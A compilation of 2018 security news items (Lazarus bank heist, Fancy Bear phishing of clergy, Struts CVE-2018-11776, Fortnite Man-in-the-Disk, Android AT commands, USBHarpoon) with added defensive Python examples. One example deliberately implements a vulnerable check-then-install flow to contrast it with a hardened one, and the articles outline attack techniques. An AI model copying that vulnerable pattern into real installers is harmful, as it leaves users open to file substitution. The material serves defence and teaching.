He thinks that network segmentation is still important, but that it won't look the same as the traditional designs. "The three most important aspects of any IoT security strategy," he suggests, "will be device identification, network segmentation, and network traffic analytics. IoT becomes a big data problem with lots of devices producing huge amounts of data and a large amount of remote access. These deployments will need to be monitored in real time to identify the difference between approved and unapproved behaviors."

North Korea-linked Hackers Stole $13.5 Million From Cosmos Bank: Report
28.8.2018 securityweek APT  BigBrothers

The North Korea-linked hacking group Lazarus is believed to have stolen $13.5 million in a recent cyber-attack on the SWIFT and ATM infrastructure of India's Cosmos Bank.

The attackers likely gained access to the bank’s systems via spear phishing and/or remote administration/third-party interface and used multiple attack techniques to steal funds. The theft took place between August 10 and 13, 2018, according to researchers from Securonix.

Believed to be backed by the North Korean government, the Lazarus group was said last year to be the most serious threat to banks. This year, the hackers also focused heavily on crypto-currency exchanges and have been involved in numerous attacks against such organizations.

A recent report also revealed that most malware families originating from North Korea can be linked to Lazarus via code reuse.

Now, Securonix security researchers say Lazarus was behind a high-profile ATM/SWIFT banking attack on Cosmos Bank, a 112-year-old cooperative bank in India and the second-largest cooperative bank in the country.

As part of the incident, the hackers are believed to have leveraged a previously established foothold before compromising the bank’s internal and ATM infrastructure on August 10-11.

Likely abusing vendor ATM test software or modifying the currently deployed ATM payment switch software, they set up a malicious ATM/POS switch and hijacked the connection between the central switch and the backend/Core Banking System (CBS).

Next, they made adjustments to the target account balances to enable withdrawals and leveraged the malicious switch to authorize ATM withdrawals for over $11.5 million in tens of thousands of domestic and international transactions, using 450 cloned (non-EMV) debit cards in 28 countries.

The malicious switch was used to send fake authorization messages for the transactions and to prevent the details sent from the payment switch from reaching the CBS (so the checks on card number, card status, PIN and more were never performed).

On August 13, 2018, likely after lateral movement, the threat actor abused compromised LSO/RSO (left/right security officer) authentication in the Cosmos Bank’s SWIFT Alliance Access (SAA) environment to send three international wire transfer requests, totalling around $2 million, to ALM Trading Limited at Hang Seng Bank in Hong Kong.

“The ATM/POS banking switch that was compromised in the Cosmos Bank attack is a component that typically provides hosted ATM/POS terminal support, an interface to core banking solution (CBS) or another core financial system, and connectivity to regional, national or international networks. The primary purpose of the system is to perform transaction processing and routing decisions,” Securonix explains.

By focusing on the bank’s infrastructure instead of basic card-not-present (CNP), jackpotting or black-box fraud, the well-planned, highly coordinated attack was able to bypass the bank’s layers of defense against ATM attacks.
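Two reconciliation checks that would surface the pattern described above, as an added example that is neither Securonix's code nor the bank's: a switch that approves withdrawals the core banking system (CBS) never sees, and cloned cards being cashed out in several countries at once. The SWITCH_LOG and CBS_LEDGER records are constructed with masked card tokens, and the field names, time window and sample amounts are assumptions.

```python
"""Added example; not Securonix's code or the bank's.

Reconciles the ATM switch's own authorization log against the core banking
system (CBS) ledger. A healthy switch forwards every authorization to the CBS,
so approvals with no CBS posting point to a switch that is answering on its
own. A second pass flags cards approved in more than one country within a
short window, the signature of mass cash-out with cloned cards.
Field names, window and sample records are assumptions for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def orphan_approvals(switch_log, cbs_ledger):
    """Approvals the switch issued that have no matching CBS posting."""
    posted = {p["txn_id"] for p in cbs_ledger}
    return [t for t in switch_log if t["approved"] and t["txn_id"] not in posted]


def multi_country_cards(switch_log, window=timedelta(hours=2)):
    """Cards with approvals in more than one country inside `window`.
    Returns {card: sorted list of countries seen}."""
    by_card = defaultdict(list)
    for t in switch_log:
        if t["approved"]:
            by_card[t["card"]].append(t)
    flagged = {}
    for card, txns in by_card.items():
        txns.sort(key=lambda t: t["ts"])
        for i, a in enumerate(txns):
            for b in txns[i + 1:]:
                if b["ts"] - a["ts"] > window:
                    break           # sorted by time, nothing later can be inside the window
                if b["country"] != a["country"]:
                    flagged.setdefault(card, set()).update({a["country"], b["country"]})
    return {card: sorted(c) for card, c in flagged.items()}


def magstripe_share(switch_log):
    """Fraction of approved withdrawals made without EMV (chip) verification."""
    approved = [t for t in switch_log if t["approved"]]
    if not approved:
        return 0.0
    return sum(1 for t in approved if not t["emv"]) / len(approved)


T0 = datetime(2018, 8, 11, 3, 0)
SWITCH_LOG = [  # constructed
    dict(txn_id="T001", card="card-001", country="IN", amount=5000, emv=True,  approved=True,  ts=T0),
    dict(txn_id="T002", card="card-002", country="CA", amount=800,  emv=False, approved=True,  ts=T0 + timedelta(minutes=5)),
    dict(txn_id="T003", card="card-002", country="HK", amount=800,  emv=False, approved=True,  ts=T0 + timedelta(minutes=12)),
    dict(txn_id="T004", card="card-003", country="US", amount=600,  emv=False, approved=True,  ts=T0 + timedelta(minutes=20)),
    dict(txn_id="T005", card="card-004", country="IN", amount=200,  emv=True,  approved=False, ts=T0 + timedelta(minutes=30)),
]
CBS_LEDGER = [  # constructed: only T001 ever reached core banking
    dict(txn_id="T001", card="card-001", amount=5000),
]

if __name__ == "__main__":
    print("orphan approvals:", [t["txn_id"] for t in orphan_approvals(SWITCH_LOG, CBS_LEDGER)])
    print("multi-country cards:", multi_country_cards(SWITCH_LOG))
    print(f"non-EMV share of approvals: {magstripe_share(SWITCH_LOG):.0%}")
```

The orphan check is the one that matters here: the attack worked precisely because the CBS never saw the requests, so comparing the switch's approvals with the ledger on a short cycle, rather than at end of day, is what shortens the window in which a hijacked switch can keep authorizing.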

The security firm attributes the attack to Lazarus, a group known for using Windows admin shares for lateral movement, custom command and control (C&C) servers that mimic TLS, Windows services for persistence, timestomping, and reflective DLL injection, along with other techniques.

Sacrilegious Spies: Russians Tried Hacking Orthodox Clergy
28.8.2018 securityweek BigBrothers

Russian Hackers Who Bedeviled 2016 U.S. Election Also Spied on Senior Orthodox Christian Figures

LONDON (AP) — The Russian hackers indicted by the U.S. special prosecutor last month have spent years trying to steal the private correspondence of some of the world's most senior Orthodox Christian figures, The Associated Press has found, illustrating the high stakes as Kiev and Moscow wrestle over the religious future of Ukraine.

The targets included top aides to Ecumenical Patriarch Bartholomew I, who often is described as the first among equals of the world's Eastern Orthodox Christian leaders.

The Istanbul-based patriarch is currently mulling whether to accept a Ukrainian bid to tear that country's church from its association with Russia, a potential split fueled by the armed conflict between Ukrainian military forces and Russia-backed separatists in eastern Ukraine.

The AP's evidence comes from a hit list of 4,700 email addresses supplied last year by Secureworks, a subsidiary of Dell Technologies.

The AP has been mining the data for months, uncovering how a group of Russian hackers widely known as Fancy Bear tried to break into the emails of U.S. Democrats, defense contractors, intelligence workers, international journalists and even American military wives. In July, as part of special counsel Robert Mueller's ongoing investigation into Russian interference in the 2016 U.S. election, a U.S. grand jury identified 12 Russian intelligence agents as being behind the group's hack-and-leak assault against Hillary Clinton's presidential campaign.

The targeting of high-profile religious figures demonstrates the wide net cast by the cyberspies.

Patriarch Bartholomew claims the exclusive right to grant a "Tomos of Autocephaly," or full ecclesiastic independence, sought by the Ukrainians. It would be a momentous step, splitting the world's largest Eastern Orthodox denomination and severely eroding the power and prestige of the Moscow Patriarchate, which has positioned itself as a leading player within the global Orthodox community.

Ukraine is lobbying hard for a religious divorce from Russia and some observers say the issue could be decided as soon as next month.

"If something like this will take place on their doorstep, it would be a huge blow to the claims of Moscow's transnational role," said Vasilios Makrides, a specialist in Orthodox Christianity at the University of Erfurt in Germany. "It's something I don't think they will accept."

The Kremlin is scrambling to help Moscow's Patriarch Kirill retain his traditional role as the head of the Ukrainian Orthodox Church and "the more they know, the better it is for them," Makrides said.

The Russian Orthodox Church said it had no information about the hacking and declined comment. Russian officials referred the AP to previous denials by the Kremlin that it has anything to do with Fancy Bear, despite a growing body of evidence to the contrary.

Ukrainian President Petro Poroshenko flew to Istanbul in April in an effort to convince the patriarch to agree to a split, which he has described as "a matter of our independence and our national security." Moscow's Patriarch Kirill is flying to Turkey later this week in a last-ditch bid to prevent it.

Hilarion Alfeyev, Kirill's representative abroad, has warned that granting the Tomos could lead to the biggest Christian schism since 1054, when Catholic and Orthodox believers parted ways.

"If such a thing happens, Orthodox unity will be buried," Alfeyev said.

The issue is an extraordinarily sensitive one for the Ecumenical Patriarchate. Reached by phone, spokesman Nikos-Giorgos Papachristou said: "I don't want to be a part of this story."

Other church officials spoke to the AP about the hacking on condition of anonymity, saying they did not have authorization to speak to the media.

Bartholomew, who is 78, does not use email, those church officials told AP. But his aides do, and the Secureworks list spells out several attempts to crack their Gmail accounts.

Among them were several senior church officials called metropolitans, who are roughly equivalent to archbishops in the Catholic tradition. Those include Bartholomew Samaras, a key confidant of the patriarch; Emmanuel Adamakis, an influential hierarch in the church; and Elpidophoros Lambriniadis, who heads a prestigious seminary on the Turkish island of Halki. All are involved in the Tomos issue; none returned recent AP messages seeking comment.

Spy games have long been a part of the Russian Orthodox world.

The Soviet Union slaughtered tens of thousands of priests in the 1930s, but the Communists later took what survived of the church and brought it under the sway of Russia's secret police, the KGB, with clerics conscripted to spy on congregants and emigres.

The nexus between Russia's intelligence and religious establishments survived the 1991 fall of the Soviet Union and the KGB's reorganization into the FSB, according to Moscow-based political analyst Dmitry Oreshkin.

"Our church leaders are connected to the FSB and their epaulettes stick out from under their habits," Oreshkin said. "They provide Vladimir Putin's policy with an ideological foundation."

That might make one target found by the AP seem curious: The Moscow Patriarch's press secretary, Alexander Volkov.

But Orthodox theologian Cyril Hovorun said he wouldn't be surprised to see a Russian group spying on targets close to home, saying, "they're probably checking him out just in case."

Volkov did not return AP emails seeking comment.

Hovorun is unusually qualified to speak on the issue. In 2012 he — like Volkov — was an official within the Moscow Patriarchate. But he resigned after someone leaked emails showing that he secretly supported independence-leaning Ukrainian clergy.

Hovorun has since been targeted by the Russian hackers, according to the data from Secureworks, which uses the name Iron Twilight to refer to the group.

Hovorun said he believes that those who published his emails six years ago weren't related to Fancy Bear, but he noted that their modus operandi — stealing messages and then publishing them selectively — was the same.

"We've known about this tactic before the hacking of the Democrats," Hovorun said, referring to the email disclosures that rocked America's 2016 presidential campaign. "This is a familiar story for us."

The Russian hackers' religious dragnet also extended to the United States and went beyond Orthodox Christians, taking in Muslims, Jews and Catholics whose activities might conceivably be of interest to the Russian government.

John Jillions, the chancellor of the Orthodox Church in America, provided the AP with a June 19, 2015, phishing email that Secureworks later confirmed was sent to him by Fancy Bear.

Fancy Bear also went after Ummah, an umbrella group for Ukrainian Muslims; the papal nuncio in Kiev; and an account associated with the Ukrainian Greek-Catholic Church, a Byzantine rite church that accepts the authority of the Vatican, the Secureworks data shows.

Also on the hit list: Yosyp Zisels, who directs Ukraine's Association of Jewish Organizations and Communities and has frequently been quoted defending his country from charges of anti-Semitism. Zisels said he had no knowledge of the attempted hacking. Vatican officials did not return messages.

Protestants were targeted too, including three prominent Quakers operating in the Moscow area.

Hovorun said Protestants were viewed with particularly intense suspicion by the Kremlin.

"There is an opinion shared by many in the Russian establishment that all those religious groups — like Quakers, evangelicals — they are connected to the American establishment," he said.

Secureworks' data shows hacking attempts on religious targets that took place in 2015 and 2016, but other material obtained by the AP suggests attempts to compromise the Ecumenical Patriarchate are ongoing.

On Oct. 16, 2017, an email purporting to come from Papachristou, who was just being appointed as spokesman, arrived in the inboxes of about a dozen Orthodox figures.

"Dear Hierarchs, Fathers, Brothers and Sisters in Christ!" it began, explaining that Papachristou was stepping into his new role as director of communications. "It's a very big joy for me to serve the Church on this position. Some suggestions on how to build up relations with the public and the press are provided in the file attached."

The file was rigged to install surveillance software on the recipients' computers.

The email's actual sender remains a mystery — independent analyses of the malicious message by Secureworks and its competitor CrowdStrike yielded nothing definitive.

Church officials told the AP they were disturbed by the hacker's command of church jargon and their inside knowledge of Papachristou's appointment.

"The one who made this is someone who knows us," one official said.

Priests and prelates don't make obvious targets for cyberespionage, but the stakes for the Kremlin are high as the decision on Tomos looms.

Granting the Ukrainian church full independence "would be that devastating to Russia," said Daniel Payne, a researcher on the board of the J.M. Dawson Institute of Church-State Studies at Baylor University in Texas.

"Kiev is Jerusalem for the Russian Orthodox people," Payne said. "That's where the sacred relics, monasteries, churches are ... it's sacred to the people, and to Russian identity."

Experts warn of possible attacks after PoC code for CVE-2018-11776 Struts flaw was published
27.8.2018 securityaffairs

Exploit code for the recently disclosed critical remote code execution vulnerability CVE-2018-11776 in Apache Struts 2 has been published on GitHub, and experts fear massive attacks.
The CVE-2018-11776 vulnerability affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and potentially unsupported versions of the popular Java framework.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set,” reads the security advisory published by Apache.

Experts warn that the RCE flaw can be triggered when the namespace value isn’t set for a result defined in the underlying XML configuration and, at the same time, its upper action(s) configurations have no namespace or a wildcard namespace.

The flaw could also be exploited when using a URL tag which doesn’t have value and action set and, at the same time, its upper action(s) configurations have no namespace or a wildcard namespace.

According to the experts from Semmle that discovered the flaw, the vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

An attacker could trigger the flaw by injecting their own namespace as a parameter in an HTTP request. The lack of proper validation of that parameter is the root of the problem.
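The configuration pattern described above (a result with no namespace inside a package whose namespace is missing or a wildcard) is something a defender can audit for before patching is possible. The following scanner is an added example and not Apache's or Semmle's code: it parses a constructed struts.xml, flags `redirectAction` and `chain` results that carry no `namespace` parameter inside weakly namespaced packages, and treats the package named `safe` (explicit namespace on both the package and the result) as the corrected form. The package and action names are invented for the sample.

```python
"""Audit a Struts 2 struts.xml for the CVE-2018-11776 configuration pattern:
results without a namespace parameter inside packages whose namespace is
absent, empty, or the wildcard "/*".  Added example; not the framework's code.
"""
import xml.etree.ElementTree as ET

# Constructed sample configuration (package/action names are invented).
SAMPLE_STRUTS_XML = """
<struts>
  <!-- weak: package has no namespace and the redirect result names none -->
  <package name="default" extends="struts-default">
    <action name="login" class="example.LoginAction">
      <result name="success" type="redirectAction">
        <param name="actionName">home</param>
      </result>
    </action>
  </package>
  <!-- weak: wildcard namespace on the package, no namespace on the chain result -->
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="search" class="example.SearchAction">
      <result name="success" type="chain">
        <param name="actionName">results</param>
      </result>
    </action>
  </package>
  <!-- corrected form: explicit namespace on the package and on the result -->
  <package name="safe" namespace="/app" extends="struts-default">
    <action name="home" class="example.HomeAction">
      <result name="success" type="redirectAction">
        <param name="actionName">dashboard</param>
        <param name="namespace">/app</param>
      </result>
    </action>
  </package>
</struts>
"""

# Result types that resolve another action and therefore consult the namespace.
RISKY_RESULT_TYPES = {"redirectAction", "chain"}


def package_namespace_is_weak(namespace):
    """True when the package namespace is missing, empty, or the wildcard."""
    return namespace is None or namespace.strip() in ("", "/*")


def find_namespace_less_results(xml_text):
    """Return (package, action, result type) triples matching the risky pattern."""
    root = ET.fromstring(xml_text)
    findings = []
    for pkg in root.iter("package"):
        if not package_namespace_is_weak(pkg.get("namespace")):
            continue
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                if result.get("type") not in RISKY_RESULT_TYPES:
                    continue
                has_namespace = any(
                    p.get("name") == "namespace" for p in result.findall("param")
                )
                if not has_namespace:
                    findings.append((pkg.get("name"), action.get("name"), result.get("type")))
    return findings


if __name__ == "__main__":
    for pkg, action, rtype in find_namespace_less_results(SAMPLE_STRUTS_XML):
        print(f"package={pkg} action={action} result type={rtype}: set an explicit namespace")
```

The scanner only covers results declared in XML; configurations built through annotations or the convention plugin, and `url` tags in JSP views, need a separate review. Upgrading to a fixed Struts release remains the actual remedy; the scan is for prioritising what to patch first.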

Just two days after the Apache Software Foundation released its advisory, a working proof-of-concept (PoC) was published online.

According to the experts from the threat intelligence firm Recorded Future, there is intense activity related to the Struts flaw in a number of Chinese and Russian underground forums.

“Unfortunately, this makes the vulnerability trivial to exploit — in fact, proof-of-concept code has already been released, including a Python script that allows for easy exploitation. Recorded Future has also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,” reads the analysis published by Recorded Future.

“Unlike last year’s Apache Struts exploit (CVE-2017-5638), which was at the center of the Equifax breach, this vulnerability appears easier to exploit because it does not require the Apache Struts installation to have any additional plugins running in order to successfully exploit it.”

Experts warn that the CVE-2018-11776 flaw is easier to exploit compared to the CVE-2017-5638 Apache Struts flaw that was exploited in the Equifax hack.

The number of potentially vulnerable applications could be impressive.

“Apache Struts is a very popular Java framework and there are potentially hundreds of millions of vulnerable systems that could be exploited by this flaw. The challenge is in identifying how many systems are vulnerable.” continues Recorded Future.

“Because many of the servers running Apache Struts are backend application servers, they are not always easily identified, even by the system owners.”

The principal problem is that there are many reasons why Struts installations cannot be updated immediately, especially in critical systems.

Google researcher found Fortnite Android App vulnerable to Man-in-the-Disk attacks
27.8.2018 securityaffairs Android

A Google security researcher disclosed a vulnerability in the newly released Fortnite Android App that exposes it to Man-in-the-Disk attacks.
After a long wait, the Fortnite Android app has finally arrived, but it hides an ugly surprise: it is vulnerable to Man-in-the-Disk (MitD) attacks that can allow a third-party application to crash it or run malicious code.

The flaw was discovered by Google security researchers; it could be exploited by low-privileged malicious apps already installed on a user’s phone to hijack the Fortnite Android app.

A threat actor can carry out MitD attacks when an Android app stores data outside its highly secured Internal Storage space, for example on External Storage, which is shared by all apps.

The attacker could tamper with the data stored in the external storage space.

The attacker could hijack the installation process and install other malicious apps with higher permissions.

Epic Games, the authors of the popular game, have promptly released a new version (ver. 2.1.0) that addresses the issue.

The Android Fortnite app is merely an installer: once users install the app, this installer leverages the device’s External Storage space to download and install the actual game.

“The Fortnite APK (com.epicgames.fortnite) is downloaded by the Fortnite Installer (com.epicgames.portal) to external storage:” reads a bug report published by a Google researcher.

“Any app with the WRITE_EXTERNAL_STORAGE permission can substitute the APK immediately after the download is completed and the fingerprint is verified. This is easily done using a FileObserver. The Fortnite Installer will proceed to install the substituted (fake) APK.”

The Fortnite Android App was made available for specific Samsung device models, its Installer performs the APK install silently via a private Galaxy Apps API. The only check made by the API is that the APK being installed has the package name com.epicgames.fortnite. An attacker can use a fake APK with the same package name to silently install the malicious code.
“If the fake APK has a targetSdkVersion of 22 or lower, it will be granted all permissions it requests at install-time. This vulnerability allows an app on the device to hijack the Fortnite Installer to instead install a fake APK with any permissions that would normally require user disclosure,” continues the researcher.
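The bug report describes a time-of-check/time-of-use problem: the fingerprint is checked on a file in shared storage, and the install then re-reads that same shared path. The following simulation is an added example, not the Fortnite Installer's code and not Android code: it models the two flows with plain files, a hook standing in for the window between check and use, and shows why verifying a copy held in app-private storage (and installing that copy) closes the gap. The paths, file contents and hook are constructed for the demonstration.

```python
"""Check-then-use on shared storage versus verify-the-private-copy.
Added example that simulates the Man-in-the-Disk pattern with ordinary files;
it is not the installer's code and uses no Android APIs.
"""
import hashlib
import os
import shutil
import tempfile


def sha256_of(path):
    """Hash a file in chunks, as an installer would fingerprint a download."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def install_from_shared(shared_path, expected_sha256, between_check_and_use=None):
    """Vulnerable pattern: verify the file at a shared path, then install from
    that same path. Anything written to the path in between is what gets installed."""
    if sha256_of(shared_path) != expected_sha256:
        raise ValueError("fingerprint mismatch")
    if between_check_and_use:
        between_check_and_use()  # window in which another app can rewrite the file
    with open(shared_path, "rb") as fh:
        return fh.read()  # stands in for "install these bytes"


def install_via_private_copy(shared_path, expected_sha256, private_dir, between_check_and_use=None):
    """Hardened pattern: copy into app-private storage first, verify the private
    copy, and install only that copy. Later writes to shared storage are irrelevant."""
    private_path = os.path.join(private_dir, "pending.apk")
    shutil.copyfile(shared_path, private_path)
    if sha256_of(private_path) != expected_sha256:
        raise ValueError("fingerprint mismatch")
    if between_check_and_use:
        between_check_and_use()
    with open(private_path, "rb") as fh:
        return fh.read()


def demo():
    """Run both flows with a hook that rewrites the shared file after the check.
    Returns (bytes installed by the vulnerable flow, bytes installed by the hardened flow)."""
    genuine = b"GENUINE-APK-BYTES"  # constructed stand-in for the real package
    substitute = b"SUBSTITUTED-APK-BYTES"  # constructed stand-in for a swapped file
    expected = hashlib.sha256(genuine).hexdigest()
    with tempfile.TemporaryDirectory() as shared, tempfile.TemporaryDirectory() as private:
        shared_path = os.path.join(shared, "download.apk")

        def write_genuine():
            with open(shared_path, "wb") as fh:
                fh.write(genuine)

        def rewrite_shared_file():
            with open(shared_path, "wb") as fh:
                fh.write(substitute)

        write_genuine()
        vulnerable_result = install_from_shared(shared_path, expected, rewrite_shared_file)
        write_genuine()
        hardened_result = install_via_private_copy(shared_path, expected, private, rewrite_shared_file)
    return vulnerable_result, hardened_result


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable flow installed:", vulnerable)
    print("hardened flow installed:  ", hardened)
```

The hardened flow still reads from shared storage once, but only to make the copy; the fingerprint is then checked on bytes no other app can reach, so the check and the use refer to the same data. Downloading straight into app-private storage avoids even that single read from a world-writable location.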

A video PoC of the attack was shared by the Google researcher and published by BleepingComputer.

Epic Games is disappointed by the way Google disclosed the bug. CEO Tim Sweeney explained that he had asked Google to wait longer so that the new update could be installed by a large part of its players, but the company published the news immediately, citing the risks for Android users.

“We asked Google to hold the disclosure until the update was more widely installed. They refused, creating an unnecessary risk for Android users in order to score cheap PR points,” Sweeney said on Twitter.

Tim Sweeney, replying to @manfightdragon and others on Twitter on Aug 25, 2018:

“Android is an open platform. We released software for it. When Google identified a security flaw, we worked around the clock (literally) to fix it and release an update.”

“The only irresponsible thing here is Google’s rapid public release of technical details.”
Is this Google’s revenge because Epic Games is not distributing the Fortnite Android App through Google Play?
Google, which is monitoring the installations of the game, privately explained to the Epic Games CEO that there weren’t many unpatched installs remaining.

Lance McDonald, replying to @TimSweeneyEpic and others on Twitter on Aug 25, 2018:

“I noticed in the bug tracker they just said "As per the email" with regard to choosing only to wait 7 days. Did their email elaborate at all on why they did this? It seems like there's no good reason for it.”

Tim Sweeney:

“Google did privately communicate something to the effect that they’re monitoring Fortnite installations on all Android devices(!) and felt that there weren’t many unpatched installs remaining.”
But while a reason was not left in the original bug report, in a subsequent tweet, Sweeney revealed that Google engineers provided an explanation for their decision in private.

Android mobile devices from 11 vendors are exposed to AT Commands attacks
27.8.2018 securityaffairs Android

A group of researchers has conducted an interesting study on AT command attacks on modern Android devices, discovering that models from 11 vendors are at risk.
A group of researchers from the University of Florida, Stony Brook University, and Samsung Research America has conducted an interesting study of the set of AT commands that are currently supported on modern Android devices.

The experts published a research paper titled “ATtention Spanned: Comprehensive Vulnerability Analysis of AT Commands Within the Android Ecosystem”; the findings of their study were presented at the USENIX Security Symposium a few days ago.

The research revealed that millions of mobile devices from eleven smartphone vendors are vulnerable to attacks carried out using AT commands.

AT (ATtention) commands are a set of short text strings that can be combined to perform a series of operations on mobile devices, including dialing, hanging up, and changing the parameters of the connection.

AT commands are transmitted over phone lines to control modems.

Even though international telecommunications regulators have defined the list of AT commands that all smartphones must implement, many vendors have also added custom AT command sets that can be used to manage specific features of the devices (e.g., camera control).

The experts analyzed over 2,000 Android firmware images from eleven Android OEMs (ASUS, Google, HTC, Huawei, Lenovo, LG, LineageOS, Motorola, Samsung, Sony, and ZTE) and discovered that the devices support over 3,500 different types of AT commands.

The researchers shared their findings with all affected vendors. The team published a website containing the list of phone models and firmware versions that expose the AT interface.

In some cases, using the custom AT commands it was possible to access very dangerous features implemented by the vendors. In many cases, the commands are not documented by vendors.

The experts discovered that almost all devices accept AT commands via the phone’s USB interface. To abuse the AT commands, the attacker needs physical access to the device or a malicious component in a USB dock or a charger.

“we systematically retrieve and extract 3,500 AT commands from over 2,000 Android smartphone firmware images across 11 vendors. We methodically test our corpus of AT commands against eight Android devices from four different vendors through their USB interface and characterize the powerful functionality exposed, including the ability to rewrite device firmware, bypass Android security mechanisms, exfiltrate sensitive device information, perform screen unlocks, and inject touch events solely through the use of AT commands.” reads the research paper.

“We demonstrate that the AT command interface contains an alarming amount of unconstrained functionality and represents a broad attack surface on Android devices.”

Experts explained that AT commands could be abused by attackers to rewrite device firmware, bypass Android security mechanisms, exfiltrate sensitive device information, and perform other malicious activities.


Another disconcerting discovery made by the experts is that it is possible to submit AT commands even when the phone is locked.

“In many cases, these commands are completely undocumented,” said Kevin Butler, an associate professor in the University of Florida Herbert Wertheim College of Engineering and a member of the research team, revealing that an OEM’s documentation doesn’t even mention their presence.

The researchers published videos showing how AT commands can be used to carry out attacks against mobile devices.

Experts demonstrated that arbitrary touchscreen events can be injected over USB, mimicking touchscreen taps, a trick that could give an attacker full control over a mobile device.

“Commands for sending touchscreen events and keystrokes are also discovered for LG phones and the S8+; we can see the indications on the screen. We suspect these AT commands were mainly designed for UI automation testing, since they mimic human interactions. Unfortunately, they also enable more complicated attacks which only requires a USB connection,” continues the paper.

The researchers published the shell script they used during their tests; it allowed them to find strings containing AT commands in the examined firmware images.
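The inventory step the paper describes (pulling candidate AT command strings out of firmware images so they can be compared against the documented set) can be reproduced with a short string scan. The code below is an added example, not the research team's published script: it runs a regular expression over a constructed byte blob standing in for a firmware image, counts each extended command, and, as a labelled heuristic, separates `AT+C…` commands (the shape of the 3GPP-standardised set) from everything else, which is where vendor-specific additions tend to live. The sample bytes, the command names in them, and the heuristic are assumptions for this example.

```python
"""Extract and inventory extended AT commands from a firmware image.
Added example; not the research team's script.  The regular expression
and the vendor/standard split are heuristics, not a specification.
"""
import re
from collections import Counter

# Extended AT commands start with "AT" followed by one of the prefix characters
# vendors and the standards use (+ * ^ ! $ % # & @) and an alphanumeric name.
# Basic V.250 commands such as ATD or ATH deliberately do not match, since two
# letters inside ordinary text would drown the results in false positives.
AT_COMMAND = re.compile(rb"\bAT[+*^!$%#&@][A-Za-z0-9_]{1,32}")

# Constructed stand-in for a firmware image: a few command strings mixed with
# binary noise and a decoy word ("ATTACK_MODE") that must not be picked up.
FIRMWARE_SAMPLE = (
    b"\x7fELF\x00\x00"
    b"AT+CGMI\x00"
    b"AT+CGMR\x00"
    b"\xff\xfe"
    b"AT+SYSSCOPE=1\r\n"
    b"AT%IMEI\x00"
    b"AT+CGMI?\x00"
    b"ATTACK_MODE\x00"
    b"AT*VENDORDBG\x00"
)


def extract_at_commands(blob):
    """Return a Counter of command -> number of occurrences in the blob."""
    return Counter(m.group(0).decode("ascii") for m in AT_COMMAND.finditer(blob))


def likely_vendor_commands(inventory):
    """Heuristic: commands not shaped like the standard AT+C... family are the
    ones worth manual review, because that is where undocumented features live."""
    return sorted(cmd for cmd in inventory if not cmd.startswith("AT+C"))


def scan_firmware_file(path):
    """Convenience wrapper for a real image on disk."""
    with open(path, "rb") as fh:
        return extract_at_commands(fh.read())


if __name__ == "__main__":
    inventory = extract_at_commands(FIRMWARE_SAMPLE)
    for cmd, count in sorted(inventory.items()):
        print(f"{cmd:16} x{count}")
    print("review first:", likely_vendor_commands(inventory))
```

On a real image the scan is only the first pass: the researchers then tested each candidate against live devices over USB, which is the step that turns a string list into a documented attack surface. For a defender, the list of commands accepted on a locked device is what should be compared against the OEM's documentation.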

“AT commands have become an integral part of the Android ecosystem, yet the extent of their functionality is unclear and poorly documented,” conclude the experts.

Personal details of 37,000 Eir customers exposed after the theft of a laptop
26.8.2018 securityaffairs Incident

Personal details of 37,000 Eir customers exposed after the theft of a laptop, including names, email addresses, phone numbers and account numbers.
Eir, the fixed, mobile and broadband telecommunications company of Ireland, has suffered a data breach this week.

Personal details of 37,000 Eir customers have been exposed according to the telecommunications company.

The root cause of the data leak is the off-site theft of an unencrypted laptop containing the customers’ data. Exposed records include names, email addresses, phone numbers and Eir account numbers.

“eir has reported a data breach of personal details for up to 37,000 customers to the Data Protection Commissioner. The data consists of names, email addresses, phone numbers and eir account numbers.” states the data breach notification published by the company on its official website.

“This is a result of the theft of one laptop, which was stolen off premises. No other personal or financial data relating to customers was stored on the laptop in question.”

According to the company, no financial data was exposed.


The telco reported the incident to the Data Protection Commissioner and to the gardaí; the good news for customers is that the stolen information has not been used by a third party in a targeted attack.

“Eir treats privacy and protection of all data extremely seriously and our policy is that all company laptops should be encrypted as well as password protected,” it said.

“In this case the laptop had been decrypted by a faulty security update the previous working day, which had affected a subset of our laptops and was subsequently resolved.”

Eir is notifying the affected customers of the incident.

USBHarpoon, a look-alike charging cable that can hack into your computer
26.8.2018 securityaffairs Attack

A team of security experts has devised a rogue USB charging cable named USBHarpoon that can be used to compromise a computer in just a few seconds.
The team was composed of Olaf Tan and Dennis Goh of RFID Research Group, Vincent Yiu of SYON Security, and the popular Kevin Mitnick.

The USBHarpoon takes inspiration from the BadUSB project built by researchers at Security Research Labs, led by Karsten Nohl.

Nohl demonstrated that to turn one device type into another, USB controller chips in peripherals need to be reprogrammed. Unfortunately, many USB controller chips, including those in thumb drives, have no protection from such reprogramming.

USBHarpoon uses a charging cable instead of a USB drive to do the dirty job and hack into a computer.

The cable was modified to allow both data and power to pass through, so the victim has no reason to notice any suspicious behavior.

A weaponized charging cable is not a novelty: a security researcher who goes by the Twitter handle MG posted two videos that show the BadUSB cables he has built. The cable allows MG to carry out HID attacks when plugged into a computer’s USB port.

MG on Twitter, Jan 1, 2018:

“HID attacks via USB drives have become too suspicious. What about embedding the attack inside a USB cable? Just a quick test for a few things I'm hoping to make over the next month.”

MG on Twitter, Jan 6, 2018:

“BadUSB Cable #2. HID attack through an Apple MacBook USB-C charger. Great for shared workspaces! Build info coming this month. Still working out some things. These cables work on just about any device with a USB port (Mac/Win/Linux, phones too)”
MG demonstrated that his BadUSB cable would work with the 24-pin USB-C connector used in MacBook chargers. MG added that it would “work on just about any device with a USB port,” including mobile devices.
Mitnick asked MG to build a cable for him to use in a keynote speech to demonstrate new attack methods, but he did not receive it in time for his speech.


